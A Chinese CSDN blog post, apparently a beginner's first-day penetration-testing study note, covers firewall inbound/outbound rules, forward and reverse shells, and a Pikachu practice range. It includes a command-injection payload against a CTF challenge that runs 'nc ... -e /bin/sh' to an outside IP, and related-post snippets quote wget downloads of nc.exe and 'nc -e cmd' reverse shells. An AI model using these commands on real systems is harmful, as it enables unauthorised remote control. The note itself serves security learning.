第1天-操作系统_名词_文件下载_反弹SHELL_防火墙绕过

Kn1ght814

于 2024-08-26 16:14:37 发布

阅读量150

点赞数 6

文章标签：网络安全

本文链接：https://blog.csdn.net/GYL143632/article/details/141566871

版权

网安小白，写的不好的地方敬请指点，轻喷谢谢！

棱角社区网站：

[~]#棱角 ::Edge.Forum*

防火墙

入站检测严格，出站检测宽松

windows:df防火墙

linux:iptables

常用命令

windows:Windows系统命令汇总（CMD下可直接运行）_windows命令-CSDN博客

linux:【Linux】Linux常用命令60条（含完整命令语句）_linux必学的60个命令-CSDN博客

文件上传下载

可以看棱角社区的网站：

例如：

反弹shell

正向：用服务器监听攻击机连接

反向：攻击机监听服务器连接

pikachu靶场搭建

pikachu靶场搭建教程_小皮面板创建靶场-CSDN博客

看这一篇就够了，这篇讲的是用小皮搭的靶场

复现

然后这个靶场反弹shell没弹成功，让zyf开了个ctfshow web29的靶场，然后反弹shell，连上了，但是可能CTFos这个虚拟机反应有点慢，所以没反应

payload:

https://5909aed2-8a0a-4583-84ee-76a3e7538c6c.challenge.ctf.show/?c=system("nc 113.56.218.150 11288 -e /bin/sh/");

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Kn1ght814

关注关注

6
点赞
踩
4

收藏

觉得还不错? 一键收藏
1
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

第一天：基础入门-操作系统&名词&文件下载&反弹SHELL&防火墙绕过

m0_51322401的博客

11-23

629

反弹：反弹shell（reverse shell），就是控制端监听在某TCP/UDP端口，被控端发器请求到该端口，并将其命令行的输入输出转到控制端。reverse shell与telnet，ssh等标准shell对应，本质上是网络概念的客户端与服务端的角色反转。是在硬件、软件、协议的具体实现或系统安全策略上存在的缺陷，从而可以使攻击者能够在未授权的情况下访问或破坏系统。Payload：中文"有效载荷",指成功exploit之后，真正在目标系统执行的代码或指令（漏洞利用成功后的形式，或者说通道）。

Day1 基础入门-操作系统&名词&文件下载&反弹shell&防火墙绕过

m0_73738451的博客

02-07

1479

防火墙对入站流量检测非常严格，但是对出站流量非常宽松，用受害机主动连接攻击机，让控制流量即变为出站流量。：给进入系统的方式增加一道门，通常由攻击者上传，方便下次再进入，也有开发人员预留后面，方便日后维护。：在客户端做出一些列动作后，服务器回显回来的消息，常见的如200，404，也有一些有用的错误信息。2、防火墙： xiaodi8 <-> aliyun xiaodi8 （在没有防火墙时）前端通常指与用户可视，交互信息的一端，后端常为处理信息，做出响应的一端。useradd 用户名 passwd 用户名。

1 条评论您还未登录，请先登录后发表或查看评论

第1天：基础入门-操作系统&名词&文件下载&反弹SHELL&防火墙绕过

qq_56414082的博客

10-27

379

在kali中执行wget http://47.100.167.248:8081/NC.exe -O exploit.exe，就可以下载文件。执行命令的时候，会有数据的回显，告诉自己这个命令是不是执行成功，有没有文件，但是在大部分的测试环境是没有回显的或者是回显是不齐全的。这里自己创建一个直接访问www.xiaodi8.com/nc.exe 就可以直接下载的连接。服务器是一台电脑，可以支持多个应用程序同时运行，可以处理多个同时连接，而电脑不能。用户组是一群用户的统称，给以给这个组配置不同的权限。

day01 操作系统&文件下载&反弹shell&防火墙绕过

wanjia01的博客

03-03

5717

#知识点： 1、名词解释-渗透测试-漏洞&攻击&后门&代码&专业词 2、必备技能-操作系统-用途&命令&权限&用户&防火墙 3、必备技能-文件下载-缘由&场景&使用-提权&后渗透 4、必备技能-反弹命令-缘由&场景&使用-提权&后渗透前后端，POC/EXP，Payload/Shellcode，后门/Webshell，木马/病毒，反弹，回显，跳板，黑白盒测试，暴力破解，社会工程学，撞

第1天：基础入门-操作系统&名词&文件下载&反弹Shell&防火墙绕过-小迪安全学习

qq_61125086的博客

03-05

617

前后端，POC/EXP，Payload/Shellcode，后门/Webshell，木马/病毒，反弹，回显，跳板，黑白盒测试，暴力破解，社会工程学，撞库，ATT&CK等。外网主机nc -e cmd 171.40.76.231.5577（在浏览器上搜索到ip）将当前的cmd映射到内网网地址端口去（传显）也失败（因为）这个192地址哪都有，外网主机会优先找自己的192地址，找不到该特定内网的192地址。失败（因为）171这个地址不是虚拟机的地址，只是出口（网关）的地址。-> xiaoyu防火墙（入站检测严格）

第一节：基础入门-操作系统&名词&文件下载&反弹 SHELL&防火墙绕过

m0_56655187的博客

01-02

917

基础入门-操作系统&名词&文件下载&反弹 SHELL&防火墙绕过。

第5天：基础入门-反弹SHELL&不回显带外&正反向连接&防火墙出入站&文件下载

IceCream的博客

04-03

2055

常规基本渗透命令详解：https://blog.csdn.net/weixin_43303273/article/details/83029138名词介绍：https://www.cnblogs.com/sunny11/p/13583083.html反弹shell命令生成：https://forum.ywhack.com/bountytips.php?download文件下载：https://forum.ywhack.com/bountytips.php?download**为什么使用命令下载：**文件的上

安全学习DAY05_命令&文件上传&反弹&带外

学废了的阿串的博客

07-20

138

安全学习第五天笔记，渗透命令，常规渗透命令，文件上传，反弹shell，带外回显。

网络安全行业名词_失陷主机(1)

2401_84264662的博客

04-29

1622

就是在图片中隐藏一句话木马。利用.htaccess解析图片 [1] 为PHP或者asp文件。达到执行图片内代码目的。制作方式即针对系统漏洞的特征编写的识别验证工具。

[网络安全提高篇] 一一三.Powershell恶意代码检测 (1)论文总结及抽象语法树（AST）提取

热门推荐

杨秀璋的专栏

03-11

1万+

这是作者网络安全自学教程系列，主要是关于安全工具和实践操作的在线笔记，特分享出来与博友们学习，希望您喜欢，一起进步。这篇文章将详细讲解PowerShell、Powershell恶意代码检测总结及抽象语法树（AST）提取。希望这篇文章对您有帮助，也推荐大家去阅读论文，且看且珍惜。

网络安全之路：我的系统性渗透测试学习框架

03-19

1641

没有兴趣，何来成就，难道就只是为了咕噜猫？hahaha（听不懂吧，没关系，只是因为加密了，你能从我的笔记中找到答案么嘿嘿嘿嘿！！！）注意：以下内容仅记录本人当时学习时任然不知的相关知识。笔记草率，可能有错，仅供参考。我会慢慢完善的哦！写在前面： 1.业界比较好的信息安全网站： freebuff：这个看来你已经找到了 secWiKi：ennnnn 安全客：收集了各大SRC哦，如果你哪一天灵感大发发现一个漏洞或者业务逻辑Bug，赶快去提交吧，也可以去补天，漏洞盒子提交哦！还有众测平台哈哈哈。还有

Empire用法及操作

weixin_65695770的博客

04-07

1172

Empire是一款针对Windows平台的、使用Powershell脚本作为攻击载荷的渗透攻击框架工具，具有从stager生成、提权到渗透维持的一系列功能。Empire实现了无需powshell.exe就可运行Powershell代理的功能，还可以快速在后期部署漏洞利用模块，其内置模块有键盘记录、Mimikatz、绕过UAC、内网扫描等，使用能够躲避内网检测和大部分安全防护工具的查杀，简单来说就有点类似Metasploit，是一个基于PowerShell的远程控制木马。 Empire运行在linux平台上

红队攻防渗透技术实战流程：红队目标信息收集之基础资产信息收集

HACKONE的博客

03-23

1051

在红队渗透测试中，客户的合作至关重要，他们会提供目标资产的基本信息作为初始攻击面。红队的行动范围通常是由客户明确授权界定的，这其中包括但不限于对主域名、下属子公司以及整个供应链体系中的相关资产进行安全测试。红队需严格按照约定的边界执行任务，可能涵盖但不限于对主域名下的各个子域名进行深度侦查，探究子公司间的网络互联情况，以及深入分析供应链各环节的软硬件设施、业务流程和数据交换点，以全方位评估和模拟真实攻击场景下的安全风险。在执行过程中，红队始终保持专业操守，确保所有行动均在合法、合规的前提下进行，并以增强客户

网络安全工程师面试题整理

m0_67393686的博客

07-30

7339

网络发现和安全审计工具主机发现端口扫描应用程序和版本探测操作系统探测-p指定端口扫描-sTtcp扫描-sPping扫描-Pn不进行ping扫描-o操作系统探测。

一文解读，网络安全行业人才需求情况《网络安全产业人才发展报告》

weixin_59086772的博客

10-18

8459

随着近几天国家网络安全宣传周在全国各地开展活动，网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里，惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何？该怎么提升自我能力，更快地加入网安行列。今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。一、网络安全行业市场发展情况网络时代生活越来越离不开网络，与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障，个人和企业等重.

09-16

09-16

python链表实战制作学生管理系统（附带pyqt5的界面优化）